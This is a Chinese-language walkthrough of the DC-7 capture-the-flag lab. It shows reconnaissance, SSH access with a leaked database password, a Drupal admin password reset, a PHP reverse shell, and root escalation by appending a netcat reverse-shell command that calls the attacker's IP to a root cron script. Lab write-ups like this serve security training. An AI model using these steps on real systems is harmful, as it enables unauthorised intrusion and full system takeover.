信息收集
┌──(root㉿anla)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:67:e3:7c, IPv4: 192.168.155.245
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.155.53 0a:0d:b0:31:80:4e (Unknown: locally administered)
192.168.155.227 30:03:c8:49:52:4d CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.155.230 08:00:27:70:30:17 PCS Systemtechnik GmbH
10 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.150 seconds (119.07 hosts/sec). 3 responded
┌──(root㉿anla)-[~]
└─# nmap 192.168.155.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 01:16 EDT
Nmap scan report for 192.168.155.230
Host is up (0.000061s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:70:30:17 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
┌──(root㉿anla)-[~]
└─# nmap -T4 -sS -p- -A 192.168.155.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-25 01:16 EDT
Nmap scan report for 192.168.155.230
Host is up (0.00017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
| 256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_ 256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
MAC Address: 08:00:27:70:30:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms 192.168.155.230
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.47 seconds
Penetration
1、通过web服务获取低权限用户shell
访问80的web服务
# Welcome to DC-7
DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are. :-)
While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.
What you will have to do, is to think "outside" the box.
Way "outside" the box. :-)
欢迎来到DC-7
DC-7引入了一些“新”概念,但我将留给你自己去发现它们是什么。 :-)
虽然这个挑战并不那么技术性,但如果你需要诉诸于暴力破解或字典攻击,你可能不会成功。
你需要做的,是“跳出”盒子来思考。
要“远远”地跳出盒子来思考。 :-)
百度搜索页面最下方看到的“@DC7USER”,发现是GitHub的一个项目
staffdb
This is some "code" (yes, it's not the greatest code, but that wasn't the point) for the DC-7 challenge.
This isn't a flag, btw, but if you have made it here, well done anyway. :-)
staffdb
这是DC-7挑战中的一些“代码”(是的,这不是最棒的代码,但这不是重点)。
顺便说一句,这不是一个标志,但如果你已经来到这里,无论如何都做得很好。 :-)
git clone https://github.com/Dc7User/staffdb,查看文件中的config.php
└─# cat config.php
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
但是……目标没开mysql服务,试试ssh
└─# ssh dc7user@192.168.155.230
The authenticity of host '192.168.155.230 (192.168.155.230)' can't be established.
ED25519 key fingerprint is SHA256:BDWqBUcitB8KKGYDyoeZkt2C/aXhZ7gi5xSEtOSB+Rk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? ye
Please type 'yes', 'no' or the fingerprint: yes
Warning: Permanently added '192.168.155.230' (ED25519) to the list of known hosts.
dc7user@192.168.155.230's password:
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Fri Aug 30 03:10:09 2019 from 192.168.0.100
dc7user@dc-7:~$
尝试suid提权无果
dc7user@dc-7:~/backups$ id
uid=1000(dc7user) gid=1000(dc7user) groups=1000(dc7user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
dc7user@dc-7:~/backups$ find / -perm -u=s -type f 2>/dev/null
/bin/su
/bin/ping
/bin/umount
/bin/mount
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
dc7user@dc-7:~/backups$ sudo -l
-bash: sudo: command not found
2、通过文件信息获取提权方法
在当前目录下的mbox发现会以root权限定时执行/opt/scripts/backups.sh
/opt/scripts/backups.sh
From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
(envelope-from <root@dc-7>)
id 1i3LCo-0000Eb-02
for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000
rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql [success]
意思大概是:
这段文本是一个电子邮件通知,具体是由系统上的cron守护程序(定时任务)发送的。当cron定时任务执行某个脚本(在这个例子中是/opt/scripts/backups.sh)时,它可能产生输出或错误,cron守护程序会将这些输出或错误作为电子邮件发送。
以下是这段文本的详细解释:
-
邮件头信息:
- From: 发件人是
root@dc-7,这意味着任务是由root用户执行的。 - To: 收件人也是
root@dc-7,因此这封邮件是发送给系统管理员的。 - Subject: 主题表明这是一个cron作业,执行了
/opt/scripts/backups.sh脚本。 - 日期和时间: 邮件发送的时间是
Fri, 30 Aug 2019 00:15:18 +1000。
- From: 发件人是
-
邮件内容:
- rm命令错误:
bash`rm: cannot remove '/home/dc7user/backups/*': No such file or directory`这表示脚本试图删除
/home/dc7user/backups/目录下的所有文件,但是该目录或文件不存在。- 数据库备份成功:
bash`Database dump saved to /home/dc7user/backups/website.sql [success]`这表示尽管在删除备份文件时遇到了问题,但数据库已成功备份到
/home/dc7user/backups/website.sql。 -
Cron环境变量:
- 这些
X-Cron-Env行显示了cron作业执行时的环境变量。例如,PATH、SHELL、HOME和LOGNAME都是系统环境变量,它们定义了作业如何执行。
- 这些
backups.sh
查看backups.sh
dc7user@dc-7:~$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
大概意思是:
这个脚本/opt/scripts/backups.sh看起来是用来备份网站数据库和文件的。以下是对这个脚本的逐行解释:
#!/bin/bash
这一行是shebang,它告诉系统使用/bin/bash来执行这个脚本。
rm /home/dc7user/backups/*
这行命令会删除/home/dc7user/backups/目录下所有的文件和目录。如果目录不存在,你会收到一个错误消息,就像你在电子邮件通知中看到的那样。
cd /var/www/html/
这行命令将当前工作目录切换到/var/www/html/,这通常是web服务器的根目录。
drush sql-dump --result-file=/home/dc7user/backups/website.sql
这行命令使用drush(可能是Drupal的一个命令行工具)来导出数据库,并将结果保存到/home/dc7user/backups/website.sql。注意,这里可能存在一个拼写错误,通常是drush还是drush取决于你的系统安装的是什么。
cd ..
这行命令将当前工作目录切换回上一级目录,也就是/var/www/。
tar -czf /home/dc7user/backups/website.tar.gz html/
这行命令创建一个名为website.tar.gz的压缩归档文件,包含html/目录的内容。
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
这行命令使用GPG(GNU Privacy Guard)对数据库备份文件website.sql进行对称加密,使用指定的密码PickYourOwnPassword。--pinentry-mode loopback选项用于在脚本中提供密码,而不是交互式地提示用户输入。
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
与上一行类似,这行命令对归档文件website.tar.gz进行对称加密。
chown dc7user:dc7user /home/dc7user/backups/*
这行命令将/home/dc7user/backups/目录下所有文件和目录的所有权更改为dc7user用户和dc7user组。
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
最后两行命令删除未加密的备份文件website.sql和website.tar.gz,因为它们已经被加密并保存在相同的目录中。
利用
补充:
drush是一个shell接口,用于从云服务器命令行管理Drupal。
需要在 drupal web目录执行(/var/www/[drupal_folder_name])
由于脚本执行是root权限,所以只要把反弹shell命令写入该脚本即可得到root权限。使用ls -al可以知道www-data用户即网站用户对该脚本具有写入权限。所以现在需要拿到网站的反弹shell。
查阅drush相关命令得知drush user-password 用户名 --password="密码"可以修改密码。drupal网站的有默认管理员用户为admin
dc7user@dc-7:/var/www/html$ drush user-password admin --password="admin"
Changed password for admin
网页登录admin,在content下可以添加新页面,但是没有PHP code选项。搜索了解到Drupal 8将PHP Filter移除了,让有需求的用户手动安装
访问https://www.drupal.org/project/php/releases/8.x-1.1下载tar.gz类型的包,在Extend模块下进行安装并启用,回到Content模块新建页面写入<?php phpinfo(); ?>,保存后显示了phpinfo页面。
反弹shell使用php的php-reverse-shell(PHP反向外壳),更改一下ip、port即可
┌──(root㉿anla)-[~/staffdb]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.230: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.230] 33192
Linux dc-7 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u5 (2019-08-11) x86_64 GNU/Linux
23:10:50 up 1:20, 0 users, load average: 0.03, 0.02, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c
Argument expected for the -c option
usage: python [option] ... [-c cmd | -m mod | file | -] [arg] ...
Try `python -h' for more information.
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-7:/$ ls
ls
bin etc initrd.img.old lost+found opt run sys var
boot home lib media proc sbin tmp vmlinuz
dev initrd.img lib64 mnt root srv usr vmlinuz.old
www-data@dc-7:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
往脚本内写入反弹shell,监听相关端口等待一段挺长的时间后定时任务触发,拿到权限(我这里用了同样的端口所以得先退出当前www-data的shell)
www-data@dc-7:/$ echo 'nc -e /bin/bash 192.168.155.245 1234'>>/opt/scripts/backups.sh
<bash 192.168.155.245 1234'>>/opt/scripts/backups.sh
www-data@dc-7:/$ cat /opt/scripts/backups.sh
cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
nc -e /bin/bash 192.168.155.245 1234
www-data@dc-7:/$ ^C sent 161, rcvd 1455
┌──(root㉿anla)-[~/staffdb]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.155.230: inverse host lookup failed: Unknown host
connect to [192.168.155.245] from (UNKNOWN) [192.168.155.230] 33194
python -c 'import pty; pty.spawn("/bin/bash")'
root@dc-7:/var/www# whoami
whoami
root
root@dc-7:/var/www# id
id
uid=0(root) gid=0(root) groups=0(root)
root@dc-7:/var/www# cd /root
cd /root
root@dc-7:~# ls
ls
theflag.txt
root@dc-7:~# cat theflag.txt
cat theflag.txt
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those
who have provided feedback, and all those who have taken the time to complete these little
challenges.
I'm sending out an especially big thanks to:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
If you enjoyed this CTF, send me a tweet via @DCAU7.
祝贺!!!
希望你喜欢 DC-7。在此,我想向所有提供反馈的人,以及那些花时间完成这些挑战的人表示衷心的感谢。
我要特别感谢以下几位:
@4nqr34z
@D4mianWayne
@0xmzfr
@theart42
如果你喜欢这次 CTF,请通过 @DCAU7 给我发送推文。
root@dc-7:~#
517
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
